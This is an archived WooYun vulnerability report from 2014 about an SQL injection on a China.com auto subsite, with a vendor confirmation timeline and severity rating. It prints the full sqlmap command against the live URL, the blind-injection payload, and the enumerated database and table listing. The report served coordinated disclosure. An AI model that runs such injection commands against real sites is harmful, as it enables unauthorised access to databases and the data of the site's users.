乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-07: 细节已通知厂商并且等待厂商处理中 2014-10-11: 厂商已经确认,细节仅向厂商公开 2014-10-21: 细节向核心白帽子及相关领域专家公开 2014-10-31: 细节向普通白帽子公开 2014-11-10: 细节向实习白帽子公开 2014-11-21: 细节向公众公开
中华网某分站SQL注入漏洞
sqlmap.py -u http://data.auto.china.com/SearchAction.do?processID=search --data "keyword=%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97" --level=5 --risk=3 --dbms=oracle --dbs
---Place: POSTParameter: keyword Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: keyword=-8119' OR (6558=6558) AND 'pkqH' LIKE 'pkqH--- available databases [3]:[*] CARTHIRD[*] SYS[*] SYSTEM
Database: CARTHIRD+-------------------------+---------+| Table | Entries |+-------------------------+---------+| AUTO_ATTR_MAP | 1377654 || AUTO_ATTR_MAPBAK | 1297370 || MANALOG | 640123 || SALE_AUTO | 269926 || SALE_AUTOBAK | 269817 || SALE_AUTO_20140226 | 269783 || AUTO_ATTR_TEMPLATE | 135357 || TMP_SALE_AUTO | 90919 || TMP_SALEAUTO | 46022 || TMP_SALEAUTO2 | 43843 || FRANCHISE_AGENT | 34174 || TMP_FA2 | 31294 || AUTOTYPE_COMPETITION | 31180 || AUTOTYPE_COMPETITIONBAK | 31180 || TMP_FA | 27116 || CATALOG_NEWS | 18852 || SUB_NEWS | 13501 || SUB_MANALOG | 12077 || CATA_ATTR_MAP | 11020 || AUTOTYPE | 8167 || AUTOTYPE_20140304 | 8148 || TPIC | 7685 || FRANCHISE_NEWS | 5479 || TMP_AUTO | 4923 || FRANCHISE | 4697 || RT11678 | 4695 || AUTO51_TYPE | 4605 || FRANCHISE_0120BAK01 | 4411 || TMP_AUTO2 | 4290 || TMP_AUTOTYPE | 3931 || TPICGROUP | 3694 || WIKI | 1642 || TMP_20120301 | 1259 |……
如上
过滤
危害等级:中
漏洞Rank:9
确认时间:2014-10-11 17:19
暂无